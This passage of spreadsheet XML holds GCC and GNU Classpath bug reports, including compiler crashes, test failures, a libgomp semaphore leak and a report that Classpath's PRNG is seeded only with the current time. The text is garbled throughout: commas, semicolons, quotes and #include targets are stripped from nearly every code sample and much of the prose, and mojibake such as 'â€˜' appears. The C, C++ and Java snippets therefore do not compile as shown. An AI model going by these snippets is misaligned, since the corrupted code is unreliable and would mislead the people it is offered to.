_Unwind_RaiseException_Phase2 repeats the same unwind path but compares cfa of traced context with exc-&gt;private2. In our case match_handler wrongly determines that _ZN7Throw_33fooEJiP6JArrayIiE is the function with handler since its cfa matches the one from exc-&gt;private2. Since _ZN7Throw_33fooEJiP6JArrayIiE does not define any personality handler gcc_assert (!match_handler) triggers with a controlled crash of the application.
Looking a bit further why we get two functions with the same cfa. This pointer gets updated from uw_update_context_1 but it changes only in CFA_REG_OFFSET and CFA_EXP cases. So with FDE as above we get two contexts with identical identification.
IMO this points to a bug in generic dwarf2 exception handling in how context is identified. For illustration I will attach asm dump object dump and corresponding .eh_frame --dwarf dump of Throw_3.java.
[1] http://gcc.gnu.org/ml/gcc-testresults/2011-10/msg01333.html</t>
  </si>
  <si>
    <t>GCC-52359</t>
  </si>
  <si>
    <t>time test is too load-sensitive</t>
  </si>
  <si>
    <t>It seems that the libgo time test is too load-sensitive: I've seen it fail
several times like this:
--- FAIL: time_test.TestTicker (1.43 seconds)
	???:1: 10 100ms ticks took 1.432394s expected [800ms1.2s]
FAIL
FAIL: time
--- FAIL: time_test.TestTicker (1.30 seconds)
	???:1: 10 100ms ticks took 1.301332s expected [800ms1.2s]
FAIL
FAIL: time
This happens more often on a Sun Fire X4450 (4 x 2.93 GHz Xeon X7350) where
make check is run with -j.
  Rainer</t>
  </si>
  <si>
    <t>GCC-4669</t>
  </si>
  <si>
    <t>Re: comparing function pointer with int does not produce error</t>
  </si>
  <si>
    <t xml:space="preserve"> &gt; &gt; I'll take another attempt at declaring gcc behaviour to be correct.
 &gt; &gt; According to 4.10/1 success is a null pointer constant:
 &gt; &gt; 
 &gt; &gt; # A null pointer constant is an integral constant expression (5.19)
 &gt; &gt; # rvalue of integer type that evaluates to zero. A null pointer
 &gt; &gt; # constant can be converted to a pointer type the result is the null
 &gt; &gt; # pointer value of that type and is distinguishable from every other
 &gt; &gt; # value of pointer to object or pointer to function type.
 &gt; &gt; 
 &gt; &gt; 5.19/1 defines integral constant expressions:
 &gt; &gt; 
 &gt; &gt; # An integral constant-expression can involve only literals (2.13)
 &gt; &gt; # enumerators const variables or static data members of integral or
 &gt; &gt; # enumeration types initialized with constant expressions (8.5)
 &gt; &gt; # non-type template parameters of integral or enumeration types and
 &gt; &gt; # sizeof expressions.
 &gt; 
 &gt; Then why does the following NOT compile:
 &gt; 
 &gt; void stat ()
 &gt; enum {success}
 &gt; void monk ()
 &gt; {
 &gt;   if (stat == success)
 &gt; }
 &gt; 
 &gt; cbool.cpp:6: no match for `void (&amp;)() == ' operator
 &gt; 
 &gt; As success is an enumerator which is a integral constant-expression by your
 &gt; definition above it also has zero value and thus must be a null pointer
 &gt; constant and hence the comparisom should be allowed (however distasteful
 &gt; that may be).
 In this code success does not have integer type. 3.9.1/7 specifies
 # Types bool char wchar_t and the signed and unsigned integer types
 # are collectively called integral types. A synonym for integral type
 # is integer type.
 Since a null pointer constant must be of integer type success does
 not qualify. Change it to (int)success and it compiles.
 Regards
 Martin
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-47646</t>
  </si>
  <si>
    <t>[4.6 Regression] Revision 169918 caused many testsuite failures</t>
  </si>
  <si>
    <t>On Linux/x86 revision 169918:
http://gcc.gnu.org/ml/gcc-cvs/2011-02/msg00462.html
caused:
FAIL: c-c++-common/pr20000.c  (test for warnings line 13)
FAIL: c-c++-common/pr20000.c  -Wc++-compat   (test for warnings line 13)
FAIL: c-c++-common/pr20000.c  -Wc++-compat   (test for warnings line 28)
FAIL: c-c++-common/pr20000.c  -Wc++-compat  (test for excess errors)
FAIL: c-c++-common/pr20000.c (test for excess errors)
FAIL: g++.dg/warn/Wuninitialized-5.C  (test for warnings line 8)
FAIL: g++.dg/warn/Wuninitialized-5.C (test for excess errors)
FAIL: gcc.dg/noreturn-1.c (test for excess errors)
FAIL: gcc.dg/noreturn-1.c detect return from noreturn (test for warnings line 38)
FAIL: gcc.dg/pr39666-2.c  (test for warnings line 8)
FAIL: gcc.dg/pr39666-2.c (test for excess errors)
FAIL: gcc.dg/uninit-pr19430.c  (test for warnings line 21)
FAIL: gcc.dg/uninit-pr19430.c (test for excess errors)
FAIL: gfortran.dg/pr39666-2.f90  -O   (test for warnings line 5)
FAIL: gfortran.dg/pr39666-2.f90  -O  (test for excess errors)
FAIL: objc.dg/attributes/method-noreturn-1.m -fgnu-runtime  (test for warnings line 21)
FAIL: objc.dg/attributes/method-noreturn-1.m -fgnu-runtime  (test for warnings line 25)
FAIL: objc.dg/attributes/method-noreturn-1.m -fgnu-runtime (test for excess errors)</t>
  </si>
  <si>
    <t>GCC-71769</t>
  </si>
  <si>
    <t>Invalid warning from -Wunsafe-loop-optimizations for a finite loop</t>
  </si>
  <si>
    <t>Created attachment 38834
Testcase
In the attached testcase function f compiles without warning for -O[023] but function g warns for -O[0123].  The warning is warning: cannot optimize possibly infinite loops [-Wunsafe-loop-optimizations].  The functions are very similar and I don't think it should warn in either case as the conditionals verify that the loop isn't infinite.
$ gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/opt/gcc6/bin/../libexec/gcc/x86_64-pc-linux-gnu/6.1.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-6.1.0/configure --prefix=/gcc6 --enable-libstdcxx-time=rt --disable-multilib --enable-languages=alladaobj-c++ --enable-plugins --with-gnu-as --with-gnu-ld
Thread model: posix
gcc version 6.1.0 (GCC)
$ gcc -c -std=gnu99 a.c -Wunsafe-loop-optimizations -O3
a.c: In function â€˜gâ€™:
a.c:18:2: warning: cannot optimize possibly infinite loops [-Wunsafe-loop-optimizations]
  for(int i = a i &lt;= b ++i)
  ^~~
$ cat a.c
// Warning with -Wunsafe-loop-optimizations and -O1 only
void f(int * x int a int b) {
	if (b &lt; a) b = a
	if (a &lt; 1) return
	for (int i = a i &lt;= b ++i)
		x[i] += 1
}
struct S {
        unsigned int * data
        unsigned int * d2
}
// Warning with -Wunsafe-loop-optimizations and -O1 or above
void g(struct S * x int a int b) {
        if (b &lt; a) b = a
        if (a &lt; 1) return
        for(int i = a i &lt;= b ++i)
                __builtin_memcpy(x-&gt;data x-&gt;d2 5)
}</t>
  </si>
  <si>
    <t>GCC-10680</t>
  </si>
  <si>
    <t>Inlining in inheritance seems broken.</t>
  </si>
  <si>
    <t>We have a class hierachy where there is a lot of inheritance and functions (commonly used) are in the base of the tree and the sub classes then use this functionality farther down..  But because the code is called a lot of times I'd really like the code to be inlined in the sub classes so I put some inlines into the class definition expecting the compiler to use this to inline the code as much as possible
I have reduced the code down to a few lines and can reproduce the same issues with this trivial code example.
When creating a simple inheritance system with two classes located in two different files (a.h and b.h).
a.h : 
#include  
class A {
	public:
		void a()
	protected:
		void b()
	private:
		std::list *_a
}
b.h
#include a.h
#include 
class B : public A {
	public:
		B()
	private:
		std::list *_a
}
The implementations of A and B are placed in a.cpp and b.cpp (see attachment for full code).
A program main.cpp creates an instance of B to activate the classes and cause a call to the inlined functions.
Then when compiling by.
g++ *.cpp -o testprog
The resulting message is:
/tmp/ccHXusSr.o: In function `B::B[not-in-charge]()':
/tmp/ccHXusSr.o(.text+0x18): undefined reference to `A::a()'
/tmp/ccHXusSr.o(.text+0x23): undefined reference to `A::b()'
/tmp/ccHXusSr.o: In function `B::B[in-charge]()':
/tmp/ccHXusSr.o(.text+0x42): undefined reference to `A::a()'
/tmp/ccHXusSr.o(.text+0x4d): undefined reference to `A::b()'
collect2: ld returned 1 exit status
It seems that the compiler has removed the inlined functions from the definition and only inlined them in the a.o file making them unavailable in the sub class B.   
This behaviour is different from what I expected.  
From the C++ language definition the calls A::a() and A::b() should be available in class B however the compiler has removed the code due to the inline thus they are not available in B.
This seems to me to be in conflict with the C++ language definition ?.   
I've tried adding the -fkeep-inline-functions and this fixes the issue however then enabling -O3 on the compiler will then cause several of the std:: files such as 
bool std::lexicographical_compare to become multiply defined when you use iostreams and lists from stl.
Not sure if it is a bug or an understanding issue.
Release:
gcc version 3.2.1
Environment:
Linux i686
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.2.1/specs
Configured with: ../configure --enable-languages=c c++
Thread model: posix
gcc version 3.2.1
How-To-Repeat:
take the included archive and extract it go to the directory testprog.
run make.
or
g++ *.cpp -o testprog -fkeep-inline-functions -O3
or
g++ *.cpp -o testprog -fkeep-inline-functions -finline-functions -O2
This will generate errors..
run the command 
g++ *.cpp -o testprog -fkeep-inline-functions
or
g++ *.cpp -o testprog -fkeep-inline-functions  -O2
And the code will compile flawlessly.</t>
  </si>
  <si>
    <t>GCC-6385</t>
  </si>
  <si>
    <t>sizeof fails calculating size of an structure (sizeof(struct my_struct))</t>
  </si>
  <si>
    <t>This structure:
struct msh_header
{
  char charid[3]
  int objs
}
is evaluated as a 8 bytes size object.
It sould be 7 bytes. 
It seems that aligns data to a 4 byte boundary but this is not what should happen cause structure MUST be 7.
Even this will be 8 bytes
struct msh_header
{
  char charid[1]
  int objs
}
And this 12 bytes size:
struct msh_header
{
  char charid[5]
  int objs
}
Release:
gcc-3.0.4
Environment:
linux 2.4.17 glibc 2.2.3
How-To-Repeat:
Just compile this code 
#include 
struct msh_header
{
  char charid[3]
  int objs
}
int main(int argc char **argv)
{
   printf(Size %i should be %isizeof(struct msh_header)7)
return(1)
}</t>
  </si>
  <si>
    <t>gad</t>
  </si>
  <si>
    <t>GCC-83051</t>
  </si>
  <si>
    <t>[8 Regression] ICE on valid code at -O3: in edge_badness at ipa-inline.c:1024</t>
  </si>
  <si>
    <t>$ gcctk -v
Using built-in specs.
COLLECT_GCC=gcctk
COLLECT_LTO_WRAPPER=/home/su/software/tmp/gcc/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/8.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/home/su/software/tmp/gcc/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 8.0.0 20171119 (experimental) [trunk revision 254924] (GCC)
$
$ gcctk -O2 small.c
$ gcc-7.2.0 -O3 small.c
$
$ gcctk -O3 small.c
during IPA pass: inline
small.c:30:1: internal compiler error: in edge_badness at ipa-inline.c:1024
 }
 ^
0x1471968 edge_badness
        ../../gcc-source-trunk/gcc/ipa-inline.c:1023
0x1471e69 update_edge_key
        ../../gcc-source-trunk/gcc/ipa-inline.c:1223
0x147236e update_caller_keys
        ../../gcc-source-trunk/gcc/ipa-inline.c:1345
0x1474709 inline_small_functions
        ../../gcc-source-trunk/gcc/ipa-inline.c:2051
0x1474709 ipa_inline
        ../../gcc-source-trunk/gcc/ipa-inline.c:2442
0x1474709 execute
        ../../gcc-source-trunk/gcc/ipa-inline.c:2849
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$
----------------------------------------------------------
int a[1] b c d e f g h
void fn1 (int p)
{ 
  b = b &gt;&gt; 8 ^ a[b ^ (c 
  b = b &gt;&gt; 8 ^ a[(b ^ c) 
}
static void fn2 ()
{ 
  int k
  while (1)
    while (e)
      { 
        while (g)
          while (h)
            for (k = 0 k &lt; 6 k++)
              while (f)
                fn1 (0)
        fn1 (0)
        fn1 (0)
        fn1 (0)
      }
}
int main ()
{ 
  fn2 ()
  return 0
}</t>
  </si>
  <si>
    <t>GCC-48675</t>
  </si>
  <si>
    <t>[4.7 Regression]: 20_util/hash/chi2_quality.cc timeout</t>
  </si>
  <si>
    <t>This test previously passed now it fails.
A patch in the revision range (last_known_working:first_known_failing) 172607:172613
exposed or caused this regression.  Since then it fails as follows:
Running /tmp/hpautotest-gcc1/gcc/libstdc++-v3/testsuite/libstdc++-dg/conformance.exp ...
WARNING: program timed out.
FAIL: 20_util/hash/chi2_quality.cc execution test
The messages in the .log file just tells that this was a regression.
There are two issues here the cause of the code apparently regressing to the point that the test times out and the matter of the timeout.  This PR will be about the timeout but first a sidenote subject to bug cloning for the code-regression part:
Actually that test has run successfully only between revision ranges 172431:172607 with the last known failing revision before the first working one being r172417.  Either it wrongly passed or there is a performance regression.  Checking the time to run to completion (without the 10 minute timeout in the testsuite harness) it seems likely that the pass status for those revisions really were valid and that there is a preformance regression. The regression is significant but not abnormal enough to question the numbers on the test-machine at revision r172667 the program takes according to time /path/to/cris-elf-run chi2_quality.exe:
(loaded system simulator running in parallel Intel(R) Core(TM)2 Duo CPU     E8400  @ 3.00GHz running Fedora 12)
 628.72s user 0.09s system 99% cpu 10:29.25 total
 631.07s user 0.11s system 99% cpu 10:31.49 total
(unloaded system)
 619.08s user 0.05s system 99% cpu 10:19.23 total
 621.51s user 0.23s system 99% cpu 10:21.87 total
 618.67s user 0.01s system 99% cpu 10:18.80 total
Judging from that there's a regression at least about 3..5% (assuming the test just barely passed for the successful revisions).  At this time I'm not going to investigate that further besides noting the revision numbers presto.
(End sidenote.)
So regardless of whether there's a code quality regression the test was dangerously close to a limit actually over the limit in the first place.
The test at a first glance seems parametrized for simulator testing but it really isn't.  I have a bruteforceish patch see the URL field (will be updated).</t>
  </si>
  <si>
    <t>GCC-57874</t>
  </si>
  <si>
    <t>No SFINAE on ADL lookup failure</t>
  </si>
  <si>
    <t>It seems that at least GCC 4.7 fails with an hard error on failure to lookup a function via ADL in a sfinae context if a function of that name is not visible in scope. The following test fails to compile unless WORKAROUND is defined:
#ifdef WORKAROUND
struct unusable{}
void foo(unusable)
#endif
namespace NX
{
struct X {}
void foo(X){}
}
namespace NY
{
struct Y {}
}
template
auto ADLfoo(T //decltype(foo(x))
char ADLfoo(...)
static_assert(sizeof(ADLfoo(NY::Y{})) == 1 )
static_assert(sizeof(ADLfoo(NX::X{})) == 2 )
int main(){}
# g++ --std=c++11 -C adl.cc
adl.cc: In substitution of â€˜template decltype ((foo(T{}) short int())) ADLfoo(T&amp;&amp;) [with T = NY::Y]â€™:
adl.cc:24:36:   required from here
adl.cc:19:6: error: â€˜fooâ€™ was not declared in this scope
adl.cc:19:6: note: suggested alternative:
adl.cc:9:6: note:   â€˜NX::fooâ€™
Clang 3.2 compiles this fine.</t>
  </si>
  <si>
    <t>gpderetta</t>
  </si>
  <si>
    <t>GCC-40174</t>
  </si>
  <si>
    <t>Memory leak when using '#pragma omp parallel'</t>
  </si>
  <si>
    <t>#include 
int n = 4 m = 2
int main () {
        for () {
                int i
#pragma omp parallel for num_threads(m)
		for(i = 0 i &lt; 1 i++) {}
#pragma omp parallel for num_threads(n)
                for(i = 0 i &lt; 1 i++) {}
        }
        return 0
}
When run on freebsd this test shows constant growth of virtual memory usage. Memory growth is observed only when m != n.
The problem is in libgomp/team.c.  gomp_thread_start() does gomp_sem_init()
but gomp_sem_destroy() is never called. FreeBSD implementation of sem_init()
allocates some memory for semaphore. This patch solves the problem for me:
--- gcc-4.4-20090227/libgomp/team.c.orig        2009-05-16 22:57:05.000000000 +0300
+++ gcc-4.4-20090227/libgomp/team.c     2009-05-16 22:57:14.000000000 +0300
@@ -4586 +4587 @@ gomp_team_start (void (*fn) (void *) vo
 void
 gomp_team_end (void)
 {
+  int i
   struct gomp_thread *thr = gomp_thread ()
   struct gomp_team *team = thr-&gt;ts.team
@@ -4936 +4949 @@ gomp_team_end (void)
        }
       while (ws != NULL)
     }
+
+  for(i = 1 i nthreads i++)
+    gomp_sem_destroy (team-&gt;ordered_release[i])
   gomp_sem_destroy (
 #ifndef HAVE_SYNC_BUILTINS
   gomp_mutex_destroy (
The problem is not observed on Linux because it looks like sem_init()
implementation for Linux does not do memory allocation in the process' virtual
space. The memory for the test program below grows on FreeBSD and does not
on Linux.
#include 
int
main(int argc char *argv[]) {
        sem_t sem
        for() { sem_init(}
        return 0
}</t>
  </si>
  <si>
    <t>to.my.trociny</t>
  </si>
  <si>
    <t>GCC-45117</t>
  </si>
  <si>
    <t>[4.3/4.4/4.5/4.6 Regression] Segfault in resolve_array_bound</t>
  </si>
  <si>
    <t>GCC segfaults on this program while printing diagnostic:
      SUBROUTINE DFTAX8A(FHMAPAUXIAUXTYPLOCAUX)
      COMMON /INFOA / NATICHMULNUMNQMTNENANB
     *          TMPTMP(NUM+NAUXFUNNUM+NAUXFUN)
      END
This happens in resolve_array_bound on trying to access a NULL pointer:
      gfc_error (Variable '%s' at %L in this context must be constant
		 e-&gt;symtree-&gt;n.sym-&gt;name 
(gdb) p e-&gt;symtree
$26 = (gfc_symtree *) 0x0</t>
  </si>
  <si>
    <t>GCC-5549</t>
  </si>
  <si>
    <t>compiling bind-9.2.0 on solaris 2.8</t>
  </si>
  <si>
    <t>gcc appears to be looping. This appears to be re-creatable. I'm not sure what info you need or how to get it. I have a xxgdb/gdb on this system. If you have some commands you'd like to see the output for please let me know what they are.
Release:
gcc (GCC) 3.1 20020121 (experimental)
Environment:
solaris 2.8 gnu as/ld version 020121 20020121
How-To-Repeat:
just do a build.</t>
  </si>
  <si>
    <t>george.r.goffe</t>
  </si>
  <si>
    <t>GCC-14201</t>
  </si>
  <si>
    <t>[3.4/4.0 regression] float -&gt; int (in mem) with -mieee causes unrecognizable insn+segv</t>
  </si>
  <si>
    <t>Probably target specific.
GNU C version 3.5-tree-ssa 20040217 (merged 20040211) (alphaev68-unknown-linux-gnu)
        compiled by GNU C version 3.5-tree-ssa 20040217 (merged 20040211).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
% cat test.c
void glopMaterial (float v int *shininess_i)
{
  *shininess_i = v
}
% gcc -mieee -O -c test.c   
test.c: In function `glopMaterial':
test.c:4: error: unrecognizable insn:
(insn 19 10 20 0 (set (reg:DI 42 $f10)
        (mem:SF (float_extend:DF (reg:SF 48 $f16 [ v ]))test.c:4: internal
compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-39871</t>
  </si>
  <si>
    <t>[4.3/4.4/4.5/4.6 regression] Code size increase on ARM due to poor register allocation</t>
  </si>
  <si>
    <t>The following code:
struct A
{
  int version
  const char *name
  void* group
}
struct B
{
  const char *name
  int ok
}
void func(struct A* int)
void test(struct B *p)
{
  struct A a
  a.name = p-&gt;name
  func(
}
options: --march=armv5te -mthumb -mthumb-interwork -fpic -Os
is compiled to 18 bytes by GCC 4.2.1 and to 20 bytes by GCC 4.3 (and later including 4.4).
Bisection shows that it is changed by http://gcc.gnu.org/viewcvs?view=rev&amp;revision=118475:
GCC rev118474:
        push    {lr}
        sub     sp sp #20
        ldr     r3 [r0]
        ldr     r1 [r0 #4]
        add     r0 sp #4
        str     r3 [sp #8]
        bl      func
        add     sp sp #20
        @ sp needed for prologue
        pop     {pc}
GCC rev118475:
test:
        push    {lr}
        sub     sp sp #20
        add     r2 sp #4 // this could be stored directly in r0
        ldr     r3 [r0]
        ldr     r1 [r0 #4]
        str     r3 [r2 #4]
        mov     r0 r2  // this mov can be eliminated
        bl      func
        add     sp sp #20
        @ sp needed for prologue
        pop     {pc}
A lot of CSE pass code was removed in this change so there is no surprise that CSE started to work worse after it.</t>
  </si>
  <si>
    <t>CLASSPATH-38417</t>
  </si>
  <si>
    <t>gnu.java.security.util.PRNG produces easily predictable values</t>
  </si>
  <si>
    <t>The PRNG created in gnu.java.security.util.PRNG by PRNG.getInstance will by default use only the time in milliseconds as the internal seed. This is easily predictable.
The algorithm itself seems fine (though with some more or less theoretical flaws like the fact that it cannot recover from state compromise very well) but the lack of seeding may be a problem. In particular I note that g.j.s.u.PRNG is the PRNG class used by code including SRP generating seed values for FIPS 186-3 PRNG the generators for RSA/DSA private keys and generating DSS signature k values (which is particularly relevant since a design artifact of the DSA algorithm is that if even a single k value along with the associated signature is leaked or becomes known (or in this case is easily guessed) it is easy to derive the private key using simple algebra).
It seems the convention is for each class to instantiate its own PRNG. While this is in some ways good (at least an attacker might have to guess multiple timestamps) it also prevents the user from doing more thorough seeding (for instance reading some bits from /dev/random) and feeding it into the PRNG.
I have written some proof of concept code that easily was able to replicate values produced by the PRNG using nothing other knowing the current time and searching outward from there. Since there are less than 2**35 milliseconds values in any particular year it should not be too hard for an attacker to be able to enumerate for instance all RSA keys that GNU classpath might possibly have created in 2008.
I did testing with whatever version of classpath is included in GCC 4.3.2 but 0.97.2 looks unchanged in this regard.</t>
  </si>
  <si>
    <t>CLASSPATH-27197</t>
  </si>
  <si>
    <t>JTextField: text is improperly clipped</t>
  </si>
  <si>
    <t>In a complex situation the text in a JTextField is not properly clipped and therefore painted outside of the field's drawing area. To see the problem open the Swing Activity board start the textfield demo and shrink the width of the internal frame until the horizontal scrollbar shows up. Suddenly you will see that the text is painted on the background of the desktop pane.</t>
  </si>
  <si>
    <t>GCC-1163</t>
  </si>
  <si>
    <t>Re: PR gcj/162</t>
  </si>
  <si>
    <t xml:space="preserve">State-Changed-From-To: open-&gt;closed
State-Changed-Why: This PR was created by mistake
</t>
  </si>
  <si>
    <t>GCC-68157</t>
  </si>
  <si>
    <t>[5/6 Regression] internal compiler error: in reassoc_stmt_dominates_stmt_p at tree-ssa-reassoc.c:1287</t>
  </si>
  <si>
    <t>command line:
$ cd /home/ansgar/scratch/svn/gcc5/src &amp;&amp; /pds/opt/gcc-5.1-0/bin/g++    -O3 -DNDEBUG -fstrict-aliasing -fno-rtti -fno-exceptions -fomit-frame-pointer -fno-unroll-loops -DCOMPILER_ATTRIBUTES -DUSE_RESTRICT -fno-tree-vectorize -mtune=native -pipe -fdata-sections -ffunction-sections -Wl--gc-sections -funsafe-loop-optimizations -funsafe-math-optimizations -fcx-limited-range -fno-signaling-nans -fno-math-errno -DDISABLE_FV_MG -march=native -mtune=native -Wunused -Werror -Wall -Wextra -std=c++11 -pedantic -Wshadow -Wfloat-equal -Wcast-align -Wfloat-equal -Wdisabled-optimization -Wformat=2 -Winvalid-pch -Winit-self -Wmissing-include-dirs -Wredundant-decls -Wpacked -Wpointer-arith -Wstack-protector -Wstrict-aliasing=3 -Wswitch-default -Wwrite-strings -Wlogical-op -Wno-array-bounds -Wno-maybe-uninitialized -fdiagnostics-color=auto -I/home/ansgar/scratch/svn/gcc5/src -isystem /pds/opt/fftw/include -isystem /pds/opt/parallel-netcdf/include -isystem /pds/opt/openmpi/include    -o CMakeFiles/zfs.dir/zfslbmpartcont.cpp.o -c /home/ansgar/scratch/svn/gcc5/src/zfslbmpartcont.cpp
compiler output:
/home/ansgar/scratch/svn/gcc5/src/zfslbmpartcont.cpp: In member function â€˜void ZFSLbmPartCont::detectPartColl()â€™:
/home/ansgar/scratch/svn/gcc5/src/zfslbmpartcont.cpp:2293:6: internal compiler error: in reassoc_stmt_dominates_stmt_p at tree-ssa-reassoc.c:1287
 void ZFSLbmPartCont::detectPartColl()
      ^
0xbe41f9 reassoc_stmt_dominates_stmt_p
	../../gcc-5.1.0/gcc/tree-ssa-reassoc.c:1287
0xbe43f9 sort_by_operand_rank
	../../gcc-5.1.0/gcc/tree-ssa-reassoc.c:598
0xbee6f5 vec::qsort(int (*)(void const* void const*))
	../../gcc-5.1.0/gcc/vec.h:960
0xbee6f5 vec::qsort(int (*)(void const* void const*))
	../../gcc-5.1.0/gcc/vec.h:1688
0xbee6f5 reassociate_bb
	../../gcc-5.1.0/gcc/tree-ssa-reassoc.c:4832
0xbee5a7 reassociate_bb
	../../gcc-5.1.0/gcc/tree-ssa-reassoc.c:4916
0xbee5a7 reassociate_bb
	../../gcc-5.1.0/gcc/tree-ssa-reassoc.c:4916
0xbee5a7 reassociate_bb
	../../gcc-5.1.0/gcc/tree-ssa-reassoc.c:4916
0xbee5a7 reassociate_bb
	../../gcc-5.1.0/gcc/tree-ssa-reassoc.c:4916
0xbee5a7 reassociate_bb
	../../gcc-5.1.0/gcc/tree-ssa-reassoc.c:4916
0xbf0883 do_reassoc
	../../gcc-5.1.0/gcc/tree-ssa-reassoc.c:5025
0xbf0883 execute_reassoc
	../../gcc-5.1.0/gcc/tree-ssa-reassoc.c:5107
0xbf0883 execute
	../../gcc-5.1.0/gcc/tree-ssa-reassoc.c:5140
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
gcc 5.1.0
./configure --prefix=...
GNU/Linux (openSUSE 12.3)
The error does not occur when -fno-math-errno is omitted.</t>
  </si>
  <si>
    <t>a.niemoeller2</t>
  </si>
  <si>
    <t>GCC-32233</t>
  </si>
  <si>
    <t>warning in stl_vector.h:832</t>
  </si>
  <si>
    <t>This program:
#include 
int main() {
        std::vector v(10)
}
Triggers the following warning in recent SVN versions:
/home/wouter/gcc/local/lib/gcc/x86_64-unknown-linux-gnu/4.3.0/../../../../include/c++/4.3.0/bits/stl_vector.h: In member function â€˜int std::vector::_M_fill_initialize(size_t const _Tp&amp;) [with _Tp = int _Alloc = std::allocator]â€™:
/home/wouter/gcc/local/lib/gcc/x86_64-unknown-linux-gnu/4.3.0/../../../../include/c++/4.3.0/bits/stl_vector.h:832: warning: control reaches end of non-void function</t>
  </si>
  <si>
    <t>CLASSPATH-23931</t>
  </si>
  <si>
    <t>ToolKit.createImage() throws unexpected IllegalArgumentException</t>
  </si>
  <si>
    <t>The following program throws IllegalArgumentException. Expected was either null
or a error image of some sort.
import java.awt.*
public class CreateImage
{
  public static void main(String[] args)
  {
    Toolkit toolkit = Toolkit.getDefaultToolkit()
    Image img = toolkit.createImage(/non-xisting/path/to/file-image)
    System.out.println(img)
  }
}
java.lang.IllegalArgumentException: Couldn't load image:
/non-xisting/path/to/file-image
   at gnu.java.awt.peer.gtk.GtkImage. (GtkImage.java:223)
   at gnu.java.awt.peer.gtk.GtkToolkit.createImage (GtkToolkit.java:261)
   at CreateImage.main (CreateImage.java:8)</t>
  </si>
  <si>
    <t>GCC-21282</t>
  </si>
  <si>
    <t>[4.1 Regression] Converting floor into lfloor built-in function</t>
  </si>
  <si>
    <t>I have segfault for the following c code:
extern double floor (double)
long foo (float f)
{
  return (long) floor (f)
}
Command line:
arm-elf-gcc -c -O1 1.c
Output message:
1.c: In function 'foo':
1.c:5: internal compiler error: in expand_builtin_int_roundingfn at builtins.c:2225
...
The environment was configured with:
binutils-2.14/configure --target=arm-elf
gcc/configure           --target=arm-elf --enable-language=c
newlib-1.12.0/configure --target/arm-elf
I have found the same problem for {i386 m68k mips ppc}-elf.
The bug appeared after the following patch:
http://gcc.gnu.org/ml/gcc-cvs/2005-04/msg00503.html</t>
  </si>
  <si>
    <t>GCC-57773</t>
  </si>
  <si>
    <t>-Wpedantic incorrect warning for enum bit-field</t>
  </si>
  <si>
    <t>Given this program in the file t.c:
  enum e { zero }
  struct { enum e field: 2 } s
The command gcc -Wpedantic -S t.c outputs:
  t.c:2:15: warning: type of bit-field 'field' is a GCC extension [-Wpedantic]
  struct { enum e field: 2 } s
This diagnostic should not be output.  -Wpedantic is supposed to
generate only diagnostics required by the standard.  But this
diagnostic is not required by C99 or by C11 since these standards
allow this GCC extension and do not require a diagnostic if the
extension is used.  And the diagnostic is not required by C89 since no
constraint is violated.</t>
  </si>
  <si>
    <t>GCC-50655</t>
  </si>
  <si>
    <t>Many of the new VIS2/VIS3 tests FAIL on Solaris</t>
  </si>
  <si>
    <t>As of rev 179598 many of the new VIS2/VIS3 tests FAIL on Solaris 10 and 11
both with Sun as and gas 2.21.1:
FAIL: gcc.target/sparc/cmask.c scan-assembler cmask8\\t%
FAIL: gcc.target/sparc/cmask.c scan-assembler cmask16\\t%
FAIL: gcc.target/sparc/cmask.c scan-assembler cmask32\\t%
FAIL: gcc.target/sparc/combined-1.c scan-assembler-times fandnot1\\t% 4
FAIL: gcc.target/sparc/combined-1.c scan-assembler-times for\\t% 4
FAIL: gcc.target/sparc/combined-1.c scan-assembler-times fxor\\t% 4
FAIL: gcc.target/sparc/fhalve.c scan-assembler fhadds\\t%
FAIL: gcc.target/sparc/fhalve.c scan-assembler fhaddd\\t%
FAIL: gcc.target/sparc/fhalve.c scan-assembler fhsubs\\t%
FAIL: gcc.target/sparc/fhalve.c scan-assembler fhsubd\\t%
FAIL: gcc.target/sparc/fhalve.c scan-assembler fnhadds\\t%
FAIL: gcc.target/sparc/fhalve.c scan-assembler fnhaddd\\t%
FAIL: gcc.target/sparc/fnegop.c scan-assembler fnadds\\t%
FAIL: gcc.target/sparc/fnegop.c scan-assembler fnaddd\\t%
FAIL: gcc.target/sparc/fnegop.c scan-assembler fnmuls\\t%
FAIL: gcc.target/sparc/fnegop.c scan-assembler fnmuld\\t%
FAIL: gcc.target/sparc/fnegop.c scan-assembler fnsmuld\\t%
FAIL: gcc.target/sparc/fpadds.c (test for excess errors)
UNRESOLVED: gcc.target/sparc/fpadds.c scan-assembler fpadds16\\t%
UNRESOLVED: gcc.target/sparc/fpadds.c scan-assembler fpadds16s\\t%
UNRESOLVED: gcc.target/sparc/fpadds.c scan-assembler fpsubs16\\t%
UNRESOLVED: gcc.target/sparc/fpadds.c scan-assembler fpsubs16s\\t%
UNRESOLVED: gcc.target/sparc/fpadds.c scan-assembler fpadds32\\t%
UNRESOLVED: gcc.target/sparc/fpadds.c scan-assembler fpadds32s\\t%
UNRESOLVED: gcc.target/sparc/fpadds.c scan-assembler fpsubs32\\t%
UNRESOLVED: gcc.target/sparc/fpadds.c scan-assembler fpsubs32s\\t%
FAIL: gcc.target/sparc/fshift.c (test for excess errors)
UNRESOLVED: gcc.target/sparc/fshift.c scan-assembler fsll16\\t%
UNRESOLVED: gcc.target/sparc/fshift.c scan-assembler fslas16\\t%
UNRESOLVED: gcc.target/sparc/fshift.c scan-assembler fsrl16\\t%
UNRESOLVED: gcc.target/sparc/fshift.c scan-assembler fsra16\\t%
UNRESOLVED: gcc.target/sparc/fshift.c scan-assembler fsll32\\t%
UNRESOLVED: gcc.target/sparc/fshift.c scan-assembler fslas32\\t%
